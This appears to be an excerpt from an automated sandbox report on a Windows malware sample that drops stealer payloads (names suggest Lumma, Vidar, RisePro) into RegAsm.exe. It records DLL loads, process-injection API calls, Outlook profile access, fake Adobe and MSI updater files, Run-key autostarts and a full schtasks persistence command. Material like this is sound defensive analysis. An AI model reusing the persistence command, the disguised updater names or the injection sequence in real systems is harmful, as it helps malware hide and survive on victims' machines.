Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: acgenral.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: winmm.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: samcli.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: msacm32.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: version.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: userenv.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: dwmapi.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: mpr.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: winmmbase.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: winmmbase.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: netutils.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: aclayers.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: sfc.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: sfc_os.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: version.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: wldp.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: profapi.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: dwrite.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Section loaded: textshaping.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: acgenral.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msacm32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmmbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmmbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: version.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: wldp.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: profapi.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: dwrite.dll
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Section loaded: textshaping.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: zyJWi2vy29.exe

Static file information: File size 1854464 > 1048576

Source: zyJWi2vy29.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x193a00

Source: zyJWi2vy29.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: zyJWi2vy29.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: meta2806[1].exe.3.dr

Static PE information: 0xD79ADC99 [Wed Aug 16 07:47:37 2084 UTC]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 20_2_004CF280 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,

20_2_004CF280

Source: sqlt[1].dll.24.dr

Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: 0_2_003276AD push ecx; ret	0_2_003276C0
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: 10_2_006D76AD push ecx; ret	10_2_006D76C0
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: 12_2_001276AD push ecx; ret	12_2_001276C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00433F59 push ecx; ret	20_2_00433F6C
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: 22_2_00E39536 push ecx; ret	22_2_00E39549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE810C8 push ecx; ret	24_2_20083552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE81BF9 push ecx; ret	24_2_20024C03
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: 32_2_00C576AD push ecx; ret	32_2_00C576C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\AdobeUpdaterV168_b055341c05e33d6c2334ce6d41cea915\AdobeUpdaterV168.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\AdobeUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\AdobeUpdaterV168.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\lumma2806[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\AdobeUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\AdobeUpdaterV168.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlt[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\meta2806[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\rise2806[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vidar2806[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_b055341c05e33d6c2334ce6d41cea915	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea HR" /sc HOURLY /rl HIGHEST

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_b055341c05e33d6c2334ce6d41cea915	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_b055341c05e33d6c2334ce6d41cea915	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 24_2_0041AD16 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

24_2_0041AD16

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
